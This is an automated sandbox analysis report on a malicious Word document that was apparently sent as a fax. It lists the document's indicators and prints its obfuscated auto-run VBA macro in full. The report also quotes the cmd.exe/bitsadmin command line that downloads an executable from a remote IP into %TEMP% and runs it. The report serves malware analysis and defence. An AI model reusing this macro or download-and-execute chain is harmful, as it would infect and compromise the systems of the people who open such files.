fax-120717_094384372834792.doc
This report is generated from a file or URL submitted to this webservice on December 7th 2017 16:34:44 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by
Falcon Sandbox v7.20 © Hybrid Analysis
Incident Response
Risk Assessment
- Persistence
- Spawns a lot of processes
- Fingerprint
-
Reads the active computer name
Reads the cryptographic machine GUID
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 9
-
External Systems
-
Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
- details
- 5/65 reputation engines marked "http://185.81.113.106" as malicious (7% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
-
5/60 Antivirus vendors marked sample as malicious (8% detection rate)
2/35 Antivirus vendors marked sample as malicious (5% detection rate) - source
- External System
- relevance
- 8/10
-
Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
The analysis extracted a file that was identified as malicious
- details
- 6/65 Antivirus vendors marked dropped file "urlref_http185.81.113.106L33LMj7.exe" as malicious (classified as "QVM03.0.B013.Malware" with 9% detection rate)
- source
- Binary File
- relevance
- 10/10
-
Document spawns new processes
-
Installation/Persistance
-
Utilizes bitsadmin (possibly used for persistence)
- details
-
Process "bitsadmin.exe" with commandline "bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%\1.exe" (Show Process)
Process "bitsadmin.exe" with commandline "bitsadmin /create /download j2" (Show Process)
Process "bitsadmin.exe" with commandline "bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%\1.txt" (Show Process)
Process "bitsadmin.exe" with commandline "bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0" (Show Process)
Process "bitsadmin.exe" with commandline "bitsadmin /resume j2" (Show Process)
Process "bitsadmin.exe" with commandline "bitsadmin /complete j2" (Show Process) - source
- Monitored Target
- relevance
- 5/10
-
Utilizes bitsadmin (possibly used for persistence)
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Contains embedded string that indicates auto-execute behavior
- details
- Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
- source
- File/Memory
- relevance
- 10/10
-
Spawns a lot of processes
- details
-
Spawned process "WINWORD.EXE" with commandline "/n "C:\b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc"" (Show Process)
Spawned process "cmd.exe" with commandline "/c bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%/1.exe &bitsadmin /create /download j2 &bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%/1.txt &bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0 &bitsadmin /resume j2 &bitsadmin /complete j2 && start %TEMP%/1.exe" (Show Process)
Spawned process "bitsadmin.exe" with commandline "bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%\1.exe" (Show Process)
Spawned process "bitsadmin.exe" with commandline "bitsadmin /create /download j2" (Show Process)
Spawned process "bitsadmin.exe" with commandline "bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%\1.txt" (Show Process)
Spawned process "bitsadmin.exe" with commandline "bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0" (Show Process)
Spawned process "bitsadmin.exe" with commandline "bitsadmin /resume j2" (Show Process)
Spawned process "bitsadmin.exe" with commandline "bitsadmin /complete j2" (Show Process) - source
- Monitored Target
- relevance
- 8/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Hiding 1 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 6
-
Environment Awareness
-
Reads the active computer name
- details
-
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
"cmd.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
"bitsadmin.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME") - source
- Registry Access
- relevance
- 5/10
-
Reads the cryptographic machine GUID
- details
-
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"bitsadmin.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID") - source
- Registry Access
- relevance
- 10/10
-
Reads the active computer name
-
External Systems
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
- 5/65 reputation engines marked "http://185.81.113.106" as malicious (7% detection rate)
- source
- External System
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
-
Installation/Persistance
-
Drops executable files
- details
- "urlref_http185.81.113.106L33LMj7.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Drops executable files
-
Network Related
-
Found potential IP address in binary/memory
- details
-
Heuristic match: "Added http://185.81.113.106/indexsdfgfdsafdefsdd.php -> %TEMP%\1.txt to job."
Heuristic match: "bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%\1.exe"
Heuristic match: "bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%\1.txt" - source
- File/Memory
- relevance
- 3/10
-
Found potential IP address in binary/memory
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings"
Found suspicious keyword "Xor" which indicates: "May attempt to obfuscate specific strings" - source
- Static Parser
- relevance
- 10/10
-
Contains embedded VBA macros with suspicious keywords
-
Informative 19
-
Environment Awareness
-
Reads the registry for installed applications
- details
-
"WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WINWORD.EXE")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WINWORD.EXE")
"WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADDRESSBOOK")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADOBE FLASH PLAYER NPAPI")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\AUTOITV3")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\CONNECTION MANAGER")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\DIRECTDRAWEX")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\DXM_RUNTIME")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\FONTCORE")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE40")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE4DATA")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE5BAKEX")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA0")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA1")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA10")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA100")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA101") - source
- Registry Access
- relevance
- 10/10
-
Reads the registry for installed applications
-
General
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Function f535970() As Long
On Error Resume Next
Dim v457985 As String, v654922 As String, v276489 As String, v888744 As Long, v699685 As Long, v633871 As Variant, v800367 As Variant, v196217 As Variant, v360979 As Long
v654922 = "sURpyTXL68ATg5t89WuxA68yP4YZyAD03eP5dlCkqoovnln67Gxz4O3AywlBm7wO2qAay4u7kX2RjfeKaeOhunHmeTN5iGQQu0f9SPfpGOJ8buk1tAtu8i9Auaox4oUqreLnQmyz8Lg6Q1WuYwJ2Zz2yEnzjJCoHJ8n6kBuZZg0I0GOFIAbY9rkDzsgJNdbycTlz2rNn1e94yK6WO0GlsZUj9Sdp9V6qLcXTjdbHvTtZ8CQoReyrVmrk3TrWwaBPZITrsZjfsGfGDIkulAD5laeyv1EeybVIutW0ZiAPfxAWsDCHyhgS0P2dyAB8UIiAwACB7iYN2wqvOw80jkPhQw7uY6cYUamA5Hup1unfT4R2ZthEZof49FiQF3Jz8rYkSvuhItsDRh3J3qVcuDPELUs9AKHFlCQPcIbWGvqSE5gKTBr8fxgS0pPxn3rv1lEiO3D84KSUkXh8nTFxdnLHWP2SgfWzQdQz11GU17GZAP5HuA368WutHOlr8ArnCl89J3R7tHi0dLK9e62WcsJIWySDuVPHzltQWAPtdBzmm2goQalSJwB8YBgbc9YRbCGTLq1EVLRJ7508kEtKPLXJXOlwKGEOFOu70OnIONb5mCzUI9kGc8LIOdfrnltUGFYddv4"
v457985 = "5IwUVX0fIScrD2j4sKb6hXKbtLKAapN4VuHHyl0BLO88VdCI2RHCzGYYXcGSXT6AtUOITF5h3zDo9rpeSsbSEGKZo2Pch94067qiPmgxggJmkH9Da9VRodthHSrIQV1dV0vnHPTx4sFNbCbABJ6S41GVuJBOQqAuEr6VPu8G7XX7fi1OzxSfuec8ndpL7L8LXnVvj5HmSfijqBA2a3iiiLLLR9jIx4LHFbl7ckSiOwKlh3shOqmpwBjlBtgwJ4gpkBqVw5UgHjKK3WrB3vy00sI97soadEyK60t9KvDAhY4iHVfPEcDVCXN5XqOjPwb3EntVqhY9Y3jV8xgS1GVSazWl4odJFzf4CKAxp8ge5rR1Ao2Q0VYh1o7omZ"
v276489 = "8peq9zGUh9foXNZYyWQm3TjtlfnvDX6EEWxHfAHjJClZaVcNK1PlcfhHenvp1ZYiwZRBDN1uGEkkgvfUzG3s6d9Fe1YCeNdYNbipSRUHNZ4qJO02cOkWc8oeJOSYK8Fe46UOCAkYKKd87mnrcUfFn8tts9JGo5Ii6IOEGyJQdOjQZa0vbcibSaFzzk7bFPbPrG8Erooqt01mw2xYnPEdi04DRtdYB4WeFXHPpOFKSaQqI7YFhceQCeSmvLKAZH95l31x4"
v800367 = "87"
v268930 = "34"
v196217 = "76"
v633871 = "41"
v633871 = Int(v268930)
v633871 = Log(v800367)
v196217 = v196217 * v268930
v888744 = 3 + 8
'Amet pariatur veniam duis amet occaecat Lorem.
v633871 = v268930 + v633871
'Cupidatat quis cillum mollit mollit nisi aliqua quis consequat veniam sint eu quis excepteur nisi.
'Exercitation eiusmod consectetur minim sit qui nulla aliqua. Voluptate id veniam ut cillum cupidatat mollit reprehenderit ea officia exercitation.
v196217 = v633871 - v196217
v360979 = 2 + 4
v268930 = v633871 - v633871
'Aliqua cillum aute labore et duis sunt cillum culpa aliquip cupidatat reprehenderit voluptate magna.
'In irure officia enim qui fugiat cillum dolor.
For i = 0 To 238742364 Step 1
v699685 = v699685 + v888744 - v360979
Next i
'Labore enim consequat amet occaecat elit reprehenderit proident consequat Lorem duis. Reprehenderit veniam veniam voluptate in laboris voluptate occaecat esse.
'Velit ex nostrud ullamco magna incididunt et.
v196217 = RGB(27, 73, 191)
'Esse veniam est occaecat adipisicing ipsum Lorem duis id eiusmod.
f535970 = v699685
End Function
Function f619350() As Long
On Error Resume Next
Dim v399231 As String, v735914 As Long, v710638 As String, v150022 As String, v295955 As Variant, v534234 As Variant, v915810 As Long, v632543 As Variant
Dim v368495(0 To 4) As String
v368495(0) = "UXpwY1VISnZaM0poYlVSaGRHRmM="
v368495(1) = "UXpwY1VISnZaM0poYlVSaGRHRmNOdz09"
v368495(2) = "UXpwY1VISnZaM0poYlVSaGRHRmNjV0ZUUW04NFlqST0="
v368495(3) = "UXpwY1VISnZaM0poYlVSaGRHRmNXbTEyVGtSak4wSjFNVzQyUkE9PQ=="
v368495(4) = "UXpwY1VISnZaM0poYlVSaGRHRmNRVmRUVW5KUk1sYzU="
v150022 = "2rO7rtIruCZY3r0Yr2XrnJzdgdirZ10sy4qYkjIUjBIA4i3xLeGizYkFxJx9VpUYhhF31E1RzbtxSKm92A5Y9fIZDJSKXDHIAswDtHewgnikvc97xaC0Gx7p35AYegGGwzpjh1lDkctOWBtzjNqBUTwUpczuogHoqopQkoGlS58i2RFrcoU5bj0OCfI640cAeW1oYPj06JZfvdBYqsbFIOXBw18I7Z5Enzab79nFB8U4HKRAxRD64byHInBsqWmS2EuraCxLoRnuNJzYxr0G8e7nrcsGhsVAONdHeaxfTpKjcZPix6ET9UiXEnUnUotsKoAE6CpCnnyGq2LN6eDJm3DtYda5zXaOUij8oyfKc4ET1q4vTN0IIG9GiG73XVBU56LZ8lf6AmjDOzNkgg53NVSzVDVmo82hPDGuogOpyHtRUSbzv6eklPKhTCBXsilCWBU0paZ1DuZbgydKbrK8RdlnNsZpORZV4hAdplN0LF2Wn8c0hlGZ4gUrKkIUz63LRQUs4D8lh7OWzjAGfNg4Jn6yrlsdeen820oc0ut1hmGtR5GUXjj8TphHp0Tdq7le"
v710638 = "WDIX7TWp6wlOLLj1OhkJ2yRSUy7f37V2UynYXYaydsfiEEsHzPJmhCwjYQqWBseZqeHPtexGXrSxDcek05pXPIca7xqEfcajs0GHwSB24uQhFXOz00jmKVt9IbsOpAiGQSuY0vO83Cl44QlxDtpILnx0shnN9czbFGivdyncNK0I4skR2gfz1nHbDy61cSInxoohhoSxuWlS0tzAzdq0eJsh7s7mGTbSaZJH6rdcnKJz4z98XXkZkS7A2LZlj0lB5FCCp3KEVXoq9o69NGhLsJPz8y1nPQCgNx4DbBdC9IeJB7sXYl1OcyYDjZ7HenSfOQJLX6PhzwxDkA1GPCeBVNDbRcCeJVSYDPk9lcsXVZURRjqU5amazDKXOUGAbxzYbCfQYtjKT5n6cR4b45gCnl5xBUbQ0wCfZNPqhO7KtOERY4rtSIFYmzSHXisHOFAwtiL7zb5JviKdrTo0P3kgwq6dhnvL6GfR6kZq74QaF8gFo7T1xVnw5vI4hU00WDGN13ESyPWEiuA2ZwKjZgiRXuCPT7X5AYBlFcgWxvTJyCh2r7SCk"
v295955 = "82"
v534234 = "86"
'Occaecat do enim anim adipisicing in eiusmod anim proident est aliquip reprehenderit dolore commodo.
v295955 = v534234 - v534234
v534234 = Sin(v295955)
For i = 0 To 4 Step 1
'Cillum incididunt irure ut tempor. Nulla Lorem cupidatat mollit aute laboris mollit aliquip.
v295955 = v295955 + v534234
'Occaecat dolore dolore elit in. Dolore cillum aute labore dolor ea velit.
v399231 = f245997(f245997(v368495(i)))
v295955 = v295955 + v534234
v295955 = Exp(v295955)
v295955 = v534234 + v534234
v295955 = v295955 + v534234
If Dir(v399231, vbDirectory) = "" Then
'Cillum aliquip anim do consequat quis.
v534234 = Cos(v295955)
'Consectetur elit ad duis anim esse laborum id dolor reprehenderit enim.
v534234 = Exp(v295955)
'Proident proident non consectetur proident proident cupidatat reprehenderit est ut. Irure nulla proident reprehenderit esse dolore aliquip et proident duis.
v735914 = v735914 = 111
v915810 = v735914
'Irure dolore quis irure incididunt quis laborum. Ullamco incididunt qui id irure in sunt reprehenderit sint nisi duis ad culpa cupidatat sit.
'Ea minim anim excepteur cupidatat nostrud esse pariatur quis dolor id quis incididunt occaecat in. Est laborum culpa fugiat qui ad exercitation.
v534234 = v295955 + v295955
'Commodo excepteur enim reprehenderit Lorem eu laboris eu sint cupidatat Lorem dolor incididunt magna. Veniam ipsum aliqua fugiat do.
Else
v735914 = 408
v915810 = v735914
Exit For
v295955 = Asc(v150022)
v534234 = Atn(v534234)
v295955 = v534234 + v534234
'Dolore eu exercitation excepteur ipsum ea commodo proident sunt labore minim magna commodo aute sunt. Commodo quis minim exercitation commodo tempor culpa ex dolore sunt consequat in officia velit.
End If
Next i
v534234 = v295955 + v295955
v534234 = v534234 + v534234
'Velit in est adipisicing irure et laborum ut eu do sit non in. Ex fugiat ex velit dolor ad.
'Minim adipisicing ad reprehenderit est labore incididunt culpa minim reprehenderit.
'Sunt magna incididunt nisi aliquip eu occaecat elit sint.
If v735914 < 104 + 146 Then
v915810 = f535970
'Magna do qui cupidatat eiusmod amet voluptate.
'Id non ea commodo ad. Excepteur adipisicing dolor nulla in irure consectetur fugiat magna ad adipisicing ex quis eu.
v534234 = v295955 + v295955
f560483 (v915810)
v295955 = Atn(v295955)
'Cillum in aute esse nisi commodo ut esse enim id.
v534234 = Cos(v534234)
Else
v735914 = 340
End If
f619350 = v735914
End Function
Sub Document_Open()
On Error Resume Next
Dim v121919 As Variant, v538623 As String, v427540 As Variant, v771268 As Variant, v914102 As String, v805286 As Variant, v125215 As String, Var_5 As Variant
v125215 = "HUmkSzvqBVhNzyVCEHIDJ0VSX8bBe8WtTkrD3lW952PXOpDVkCsWgc0m51hEWpD8hsUGS3ocf0ubon8JnpFYXW7CHozvRWIo1KsoX32uapbTF42F52604CO6fIjgVbBb3RZU67fxPbxqioRxQARRKiimZVNCyXtGEBvzJeziUc6IqkDf2VLswAEU3IF7cNEhQWkjqhwFxtXcm5xASKWN46qslcxcGy4bejXnZPBWfnhsSNBexZf1IuvUm1P1n9G8jnC6Ty5EWbHFmG4UCTj4VshkOkTfhcg80rop8OCZdaWrGhqgJH6n23PULvwAKpoKgFSgEJyQ"
v538623 = "admprReQadSVz2VgozjBKtczF3u1j4F1DeaF9wyILLgUcaittlJ0hrCnA1aTiNFkcOdVFkrjJJbNa4QAjensZeoGQWceUK8CXofJ2QJWCVEouBnuA6zZJoT1O3JzIpAX7o9Nu5fROltjYpAx6SYuwAe3ygxQZ5VoqU9q6xG0e3SK35noXan1SuIiTkgncR50xunjzR8YxLCY1YVhLs"
v914102 = "cLqKiiStInxYxLdU9PA8KTfBzzx7jiyDmJYdDnHbcGaFnlPBr4zXYRWlfWpjY5j2AUrsvpD13AHhQorKaB77qj190nlWXZL1mryUQEKiHDsE4rn0fpWs2zXm9x9DgBxiRTClwITYxr32awqVb2xvQmkYBLAnuOkDnmZ4fwIUGyuut"
v427540 = "100"
v805286 = "52"
v771268 = "93"
v121919 = "41"
v623978 = "67"
Call f92167
v121919 = v771268 + v427540
'Deserunt aliquip ipsum reprehenderit occaecat incididunt. Velit mollit reprehenderit veniam reprehenderit ad irure consequat dolor eu non culpa ut et.
'Nisi sunt pariatur non et ex eiusmod consequat minim id.
'Tempor dolor eiusmod quis velit ullamco ipsum adipisicing ad.
Call f92167
'Enim eiusmod ad ad qui consectetur deserunt ea esse anim tempor pariatur proident.
v121919 = v427540 - v771268
'Quis est qui consequat ad. Exercitation elit in officia et qui do mollit occaecat.
v771268 = Int(v805286)
'Id incididunt enim occaecat reprehenderit.
v805286 = v805286 - v771268
v623978 = v771268 - v121919
'Cillum veniam minim tempor non sint do quis dolor enim commodo.
Call f619350
v623978 = v805286 - v427540
v771268 = Sin(v771268)
v121919 = v623978 + v427540
'Aliquip culpa eu labore proident cupidatat veniam culpa. Nostrud ullamco laboris excepteur veniam culpa labore ut irure do aliqua et.
'Voluptate dolore eu fugiat sunt id velit non in eu Lorem ut voluptate ullamco dolor.
v805286 = Atn(v121919)
'Pariatur consectetur laborum quis minim cillum dolor proident dolor culpa aute sit.
'Velit cupidatat cupidatat aliquip nisi anim occaecat. Nisi in Lorem Lorem dolor.
Call f624191
'Proident irure nostrud laborum ullamco dolor. Ex Lorem pariatur eiusmod velit culpa veniam occaecat Lorem Lorem Lorem eiusmod exercitation.
'Et eiusmod occaecat mollit consequat eu voluptate. Qui qui proident ullamco sit id ullamco cupidatat id incididunt incididunt occaecat reprehenderit.
v427540 = Sqr(v623978)
'Est in eiusmod labore exercitation id ullamco duis sunt pariatur veniam. Id aute esse enim laboris cupidatat occaecat deserunt veniam aliqua nulla est laborum nisi.
'Occaecat nisi ipsum qui ullamco consectetur cillum officia occaecat excepteur duis ex.
v623978 = RGB(122, 117, 189)
v805286 = Fix(v623978)
'Id et Lorem aute eiusmod exercitation exercitation proident laboris ut officia esse non duis. Amet ipsum magna in enim amet quis cillum ea ex veniam sit laborum pariatur mollit.
v623978 = v771268 + v771268
'Reprehenderit est id in minim sunt deserunt minim reprehenderit nulla aliquip nisi sunt.
v805286 = v623978 + v121919
'Adipisicing qui elit eiusmod commodo laboris sunt amet sunt sunt officia ex. Occaecat irure laborum aute eiusmod cillum aute et in pariatur.
v623978 = Exp(v771268)
'Aliquip excepteur ad elit reprehenderit duis labore consectetur duis minim officia labore ut ullamco ex. Consequat sint adipisicing eiusmod aute dolore et proident proident.
'Irure nisi adipisicing mollit cupidatat et ullamco nostrud Lorem deserunt anim et veniam consectetur.
End Sub
Function f92167() As Long
On Error Resume Next
Dim v930682 As String, v181932 As Variant, v530875 As Variant, v742279 As String, v240057 As Variant, v133308 As Variant, v504342 As String, Var_5 As Variant
v742279 = "3xTokYVxpfOnIfp4Zvf7XmSOm6XxxihIfZDAdQCHJv1oGyrxpO8Xke77jU4gBqhUp8W2XzJr0zBg5xg2heJsr3FTGldk6mCjipRRo37aXg7qpdnpHLv7aOD1Ca8o9hQvU11JS8oEffvcW1K2C0pdGNtL9qa9eRcEopZpxOJEwE5Y7lHxU90Zs6"
v504342 = "O3mJR71aV1DGK5Rpk5mY7nIfxa5xkXypz2A36gHxtWuAUjDmGENdAFxxjlnKeTheT3d1HSJLPPU5zC1KDKzXgjvQhI7jZVCxFGFINlK8tN8mz3FGQrNGzgEJnAJnVfku0erBjF1TvLxbt8ZGKDrFy7qFtjdlk0wzJ5lYV7k86gtLHeQTKdC7vq8mYcvgauB7t6PmiY1E5B9YZAZiEs1baTOszxLladna0"
v930682 = "ndawXX5ZqZ3trgHxxhpDhqX5i3E6PCJlVCnjeEmO672mLYfIGC8nkn6vPA8gSS1tsBy7Fafqgl5kbKOc6v83FSJxyyhX1sqtthBCFKgFyoYy"
v181932 = "76"
v240057 = "65"
v133308 = "26"
v530875 = "88"
v442572 = "38"
v442572 = v442572 - v240057
v240057 = v530875 + v442572
v240057 = Sgn(v240057)
'Nisi amet incididunt aliquip id do duis ullamco ea excepteur ad ullamco ut.
'Fugiat cillum qui ullamco esse deserunt duis aliqua incididunt ad. Irure velit ea ad commodo irure aliqua.
f92167 = 1
End Function
Function f560483(num_x As Long) As Long
On Error Resume Next
Dim v664867 As Long, v152021 As Long, v847141 As Variant, v615031 As Long, v631517 As String, v572717 As String, v758456 As String, v877340 As Variant, v349656 As Variant, v71433 As String, v562180 As Variant, v240427 As String, v135778 As Variant
v71433 = "kGTzwjKFHSPLzf4gDqXLp4z8KGm2Rmp3wNxQjksipAr0RULSYkgQRWAAUugUWLoGPS2w45vjRvRFWzSl0GHYckvWbHOYgFSRH5oj"
v631517 = "HyF7Rd7bjOQBaenYsLyDyDFnr3ERqFnVebocsuujLUxvzD1rUuCXW61NUnGD8hUJKIdEAI0HI186awy15pwTCh7sDkcPfHeG0pzBXs45"
v562180 = "33"
v349656 = "98"
v877340 = "53"
v135778 = "62"
'Amet laborum elit irure sint eiusmod laborum nostrud magna.
'Dolore quis deserunt consequat laborum.
'Lorem velit incididunt amet mollit incididunt id. Quis reprehenderit nulla nostrud sit eu dolore ea enim magna ea cupidatat duis.
v877340 = Int(v562180)
'Laboris proident fugiat id ut anim culpa et qui magna.
'Ut irure laboris proident incididunt id in reprehenderit et sint amet Lorem officia ex.
'Tempor ex reprehenderit adipisicing irure eiusmod mollit excepteur aliqua nisi est labore ipsum in nostrud.
v135778 = Abs(v135778)
v135778 = Abs(v135778)
'Tempor eu laborum adipisicing fugiat fugiat aliquip consequat. Eu deserunt qui laboris id veniam laborum ad ut pariatur nisi non nostrud amet eiusmod.
'Non culpa do eu laboris anim culpa dolor sunt.
v877340 = Exp(v135778)
v758456 = "UtC3Q2yAInK7igzl167S9lmImPRmCZzuNSuXxVJzAkKUSZrUbddhOL75XoKqIJ5JjEaCZqUhdhWOxflQshatAqN54v5URODSlVbhTJCrpbFdjpvo6Fp0jKAdlniokhjhHuBjRIzxqv8XAqsW99Pc19HWcgP6Oo89JYBR5IFsjcw8UGRsRU9Pjv8CLc5aFRGTZtAlmzR3dLJLBRXpgtD0Z84jiXSbCyLFcKLkFRvQtR7Stltwpi5WlRCa9ZQzT44oX3cNjO3uj8liZPogqG3jYyxfcib9UasigdPary8RVYeJhewTNfCneirxIwf1Ur5Vs2IuY3UqGIPxij"
v240427 = "MThAMTIxQDEyMkAzMkA3QDM4QDI5QDEyN0AxN0AyNEAxMEA2MUAxOEA1MEA5QDM0QDQyQDE5QDI1QDQ5QDE4QDI4QDI1QDYzQDQyQDI4QDEyN0A0NEA3QDEyMEAyNUA1MEAxOEAyOEAxMjZANDlAMTdAMzhAMjlANTBAMkAxMkAzNkA1MUAyQDEyQDM1QDEyM0A0N0AzQDEwQDEyNUA3QDUwQDExNUA1MUA0QDE1QDMwQDYyQDRAMTVAMTRANjJANkAzMUAxNEA0OUA3QDMzQDE0QDYwQDVAMzRAMTE0QDZANkA0OUA1QDZAMzFAMjhAMzZAMTIwQDdAMzhAMjlAMTI3QDE3QDI0QDEwQDM5QDI5QDE0QDI5QDVAMzBAOEAzMEA2MUA2QDI0QDEy"
v240427 = v240427 + "NkAzOUA0NkAxMkAzMEA0NEAxQDM4QDFANTlANDdAM0A1QDM1QDE3QDEyQDEyMkA1OUA0MUAzNEAxMEA2MUAxOEAxMjBAMUAzOUAxOEAxOUAyNUAzOUAyQDhAMTE0QDMyQDQxQDEyMEA0N0A2MkA0MUAxMkAxMTRAMzVAMTdAOEA5QDU4QDZAMzRAMTBAMzhAMThAMzhAMzlAMTIzQDQwQDEyMUAxM0AzMkA0MUAyOEAzOUA2MkAyQDhAMTE0QDM1QDE3QDEyQDI1QDM4QDQyQDI4QDUxQDM5QDJAMTJAMzZANTBAMkAxMkAzNUAxMjNANDdAM0AxMEAxMjVAN0A1MEAxMTVANTFANEAxNUAzMEA2MkA0QDE1QDE0QDYyQDZAMzFAMTRANDlAN0Az"
v240427 = v240427 + "M0AxNEA2MEA1QDM0QDExNEA1OUA0MUAzOEAyNUAzOUA0NkAzQDVAMzJAMTdAMzhANDdAMzhAMTdAM0A1QDM1QDE3QDM4QDI1QDM5QDE3QDM3QDVAMzJAMTdAOEAxMjZANjBANDJAM0AxMEA0NEAxQDI5QDI1QDEzQDMxQDI5QDEwQDM5QDdANDlAMTRANjJANDdAM0AzNUAxMjNAMkA4QDE3QDM0QDQyQDE5QDI1QDQ5QDE4QDI4QDI1QDYzQDQyQDI4QDEyN0A0NEA3QDEyMEA1QDM5QDQ3QDEyQDVAMTIyQDQwQDEyMEAyNUA2MUA0MUAyOEAzNUAzOUAxOEAyOEAyNUAzOUA0MEAzN0A2QDQ0QDQyQDMzQDJANDRAMjlAMTlANUAzOUA0MEAz"
v240427 = v240427 + "NEAxMjJAOUAxN0AxMjFAMjlANjJANDdAMTVANTlANUA0MUAxMjBANTlANTlANDFAMTJANTFAMzVAN0A0OUAyNkA2MkA2QDhAMTBAMzhAMThAMzhAMzlAMTIzQDQwQDEyMUAxM0AzMkA0MUAyOEAzOUA2MkAyQDhAMTE0QDUwQDE3QDE5QDVAMTIyQDQxQDI4QDMwQDQ0QDQyQDMzQDJANDRAMUAzOEAxQDU5QDQ3QDNANUAzNUAxN0AxMkAxMjJANTlANDFAMzRAMTBANjFAMThAMTIxQDExNEA2M0A0MEAxMkA1MUAzOUA0N0AxMkAzMEA0NEA0MkAzM0AyQDQ0QDFAMzRAMThANDRANDBAMTIwQDI1QDM1QDQwQDM3QDI2QDQ0QDFAMjlAMjVA"
v240427 = v240427 + "MTNAMzFAMjlAMTBAMzlAN0A0OUAxNEA2MkAxN0AxOUAzNUAzOUA0NkAzQDM1QDEyNw=="
v575024 = Str(num_x)
'Officia sint consequat nulla do duis pariatur sint duis nulla adipisicing laboris dolor. Laborum duis exercitation voluptate voluptate.
'Consequat amet ea amet excepteur nostrud sunt est sit anim id quis commodo ea incididunt.
'Tempor consectetur occaecat eu ipsum dolor veniam sit duis adipisicing duis sit et id.
